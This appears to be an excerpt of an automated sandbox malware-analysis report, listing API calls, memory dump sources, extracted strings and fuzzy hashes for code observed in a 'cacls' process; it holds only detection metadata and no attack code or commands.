                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,02CE4101,000000F4), ref: 02CF9C1F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(02CE1D39,?,02CF62C8,02CE1D39,02CF5A0E,02CF62C8,?,02CE1D39,02CF5A0E,00001000,?,?,?), ref: 02CF9BCC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 02CE86EC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 02CE86EC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02CE2040,02CF834F,02CF5A0E,02CE2006), ref: 02CE84E3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "n$)t$,$/a$8n$=G$@$B`$Pq$Yu$Z4$jJ$p$us$x`$z`$q$~
                                                                                                              • API String ID: 0-2356214696
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518105057.0000000003410000.00000040.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3410000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518105057.0000000003410000.00000040.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3410000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                              • API String ID: 0-3558027158
                                                                                                              • Opcode ID: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                                                                              • Instruction ID: 726dc429f433ce065e3b4ea6c6a22b8bb42a2aa55c0f40450d3751e78ac7a7e0
                                                                                                              • Opcode Fuzzy Hash: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                                                                              • Instruction Fuzzy Hash: 5A9150F04082948AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8955CB85
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: b289c3cc07d14fbab2bf20aaeb05887f3020c86a86807ddc246b26e0658f2af3
                                                                                                              • Instruction ID: 7eb48466dfb0f88ba23403ccaac7538ad422c69abd15607f00930a2524097ca9
                                                                                                              • Opcode Fuzzy Hash: b289c3cc07d14fbab2bf20aaeb05887f3020c86a86807ddc246b26e0658f2af3
                                                                                                              • Instruction Fuzzy Hash: A8512EB5A00216BFDF10EF98E88057EFBF8BB49200B548A69E465E7651D334DF518BE0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 4744f971406023b550ddb7190ed0a25040203c231967fb5d72760fa44ce7bc8f
                                                                                                              • Instruction ID: 8d6547a544b49536f4042eef6d46e63bfea157f6fdf63c4f14740614f6cd2431
                                                                                                              • Opcode Fuzzy Hash: 4744f971406023b550ddb7190ed0a25040203c231967fb5d72760fa44ce7bc8f
                                                                                                              • Instruction Fuzzy Hash: 4E51E6B9A00A45AFDB20DF9CE89097FB7F9FB44200F048C59E695CB651E7B4DA408760
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035B46FC
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 035B4725
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 035B4742
                                                                                                              • Execute=1, xrefs: 035B4713
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 035B4655
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 035B4787
                                                                                                              • ExecuteOptions, xrefs: 035B46A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 7847c06d4498ef53d7559fc0d75b3b56da8e3c3f4d71912383ed1aaac34ef2f4
                                                                                                              • Instruction ID: 309b23e023fbbadf270f821ba3c7b10eab70845f3063b0189409ee6a422cc897
                                                                                                              • Opcode Fuzzy Hash: 7847c06d4498ef53d7559fc0d75b3b56da8e3c3f4d71912383ed1aaac34ef2f4
                                                                                                              • Instruction Fuzzy Hash: 5151E775600319BBDB20EBA5FC85BFE77B8BB49304F0404A9D505AB1B1E771AA45CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction ID: 088892dec644f39d7ad18c30a785e6e06737af4b6a990de4d88e1b1e7dcddf49
                                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction Fuzzy Hash: 64020279508341AFC305DF28C590A6BBBF5EFC8704F088A6DF9899B264DB31E915CB42
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction ID: b8cae0221e61cd9ba530f97c3b45b0d6e659ceb33bcd326d5949a103a8177c8f
                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction Fuzzy Hash: A281BE70E052499EDF24EF69E8917BEBBBABF45310F1C465AD861B73B0C73498418B90
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: d13ae5fc19e99360f894b11fdb303f7551f9e03d6317731e85e20ed8d433f279
                                                                                                              • Instruction ID: d4f8f164d59120259e3c930f1c3ff0486f183e186f101c7b68fa862ce7bcd812
                                                                                                              • Opcode Fuzzy Hash: d13ae5fc19e99360f894b11fdb303f7551f9e03d6317731e85e20ed8d433f279
                                                                                                              • Instruction Fuzzy Hash: D82156BAA002599FDB10EF69E840DEEB7F9FF44640F480556EA05E7250E730D9018B95
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518105057.0000000003410000.00000040.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3410000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: |de$|de$|de$|de$|de$|de
                                                                                                              • API String ID: 0-3287866246
                                                                                                              • Opcode ID: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                                                                              • Instruction ID: ad47d2fc6b3af9f8a15bea5dc85e2eb1467235de264fe1936009458c84b2961a
                                                                                                              • Opcode Fuzzy Hash: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                                                                              • Instruction Fuzzy Hash: A3216870918B4E8FCF80EFA8D885AEEBBB0FB19300F00455AD549EB221D7349245CBD6
                                                                                                              Strings
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035B02BD
                                                                                                              • RTL: Re-Waiting, xrefs: 035B031E
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035B02E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: cf61d9328d57e5fb69d365915a12d3db07a1401223f10c34764b7de7534a4a88
                                                                                                              • Instruction ID: 03c82e633ae8a854a09ca5da24c9ad15dce3c3ded91a92ac48c5a2808db2b735
                                                                                                              • Opcode Fuzzy Hash: cf61d9328d57e5fb69d365915a12d3db07a1401223f10c34764b7de7534a4a88
                                                                                                              • Instruction Fuzzy Hash: 63E1BC30A087429FD724CF28E884B6AB7F0BB85314F184A6DF5A58B2F1D774D945CB92
                                                                                                              Strings
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 035B7B7F
                                                                                                              • RTL: Resource at %p, xrefs: 035B7B8E
                                                                                                              • RTL: Re-Waiting, xrefs: 035B7BAC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: c43ccbc911f3adc4b3fc5078dfebd8bd65a99fdd86ffdf47ba85e82b23edc2a3
                                                                                                              • Instruction ID: 50d0a560e36a3b9171fbcad11a78817a325127efa442038e925bf9a282f22af5
                                                                                                              • Opcode Fuzzy Hash: c43ccbc911f3adc4b3fc5078dfebd8bd65a99fdd86ffdf47ba85e82b23edc2a3
                                                                                                              • Instruction Fuzzy Hash: ED41D0353047029FD724DE29F840B6AB7E5FF89B10F040A1DE95ADB2A0EB71E5068B91
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 035B728C
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 035B72A3
                                                                                                              • RTL: Re-Waiting, xrefs: 035B72C1
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 035B7294
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064